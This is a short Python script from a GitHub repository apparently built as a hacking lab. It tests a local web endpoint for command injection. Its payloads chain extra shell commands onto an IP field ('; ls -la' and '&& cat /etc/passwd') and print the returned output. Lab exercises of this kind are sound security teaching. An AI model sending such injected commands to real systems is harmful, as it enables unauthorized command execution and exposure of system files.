Hack-Lab-Terminal/tool_command.py at main · grnlogic/Hack-Lab-Terminal · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import requests

url = "http://localhost:5000/command"
print("[+] Command Injection Tester")

# Basic test using semicolon to chain commands
payload = "8.8.8.8; ls -la"
print(f"Testing payload: {payload}")
r = requests.post(url, data={"ip": payload})

# Extract the output from the response
import re
output = re.search(r'<pre>(.*?)</pre>', r.text, re.DOTALL)
if output:
    print("\nCommand Output:")
    print(output.group(1))
else:
    print("Couldn't extract output from response")

# Try another payload with command substitution
payload = "8.8.8.8 && cat /etc/passwd"
print(f"\nTesting payload: {payload}")
r = requests.post(url, data={"ip": payload})
output = re.search(r'<pre>(.*?)</pre>', r.text, re.DOTALL)
if output:
    print("\nCommand Output:")
    print(output.group(1))